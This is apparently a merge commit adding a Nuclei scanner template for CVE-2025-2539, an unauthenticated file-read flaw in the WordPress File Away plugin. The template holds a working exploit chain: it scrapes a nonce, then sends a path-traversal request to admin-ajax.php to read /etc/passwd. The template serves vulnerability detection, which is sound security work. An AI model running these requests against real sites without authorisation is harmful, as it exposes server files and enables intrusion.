Merge pull request #11814 from projectdiscovery/CVE-2025-2539

Create CVE-2025-2539.yaml

Author: pussycat0x

http/cves/2025/CVE-2025-2539.yaml

@@ -0,0 +1,83 @@
+id: CVE-2025-2539
+
+info:
+  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: high
+  description: |
+    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm,  to read the contents of arbitrary files on the server, which can contain sensitive information.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
+    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
+    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
+    - https://wordpress.org/plugins/file-away/#developers
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2025-2539
+    cwe-id: CWE-327
+    epss-score: 0.00038
+    epss-percentile: 0.08036
+  metadata:
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/file-away/"
+  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: nonce
+        group: 1
+        regex:
+          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd
+
+    matchers:
+      - type: word
+        part: body
+        internal: true
+        words:
+          - fileaway_download
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: download_url
+        group: 1
+        regex:
+          - '".*(\?.*?)"'
+
+  - raw:
+      - |
+        GET /{{download_url}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: content_type
+        words:
+          - "application/force-download"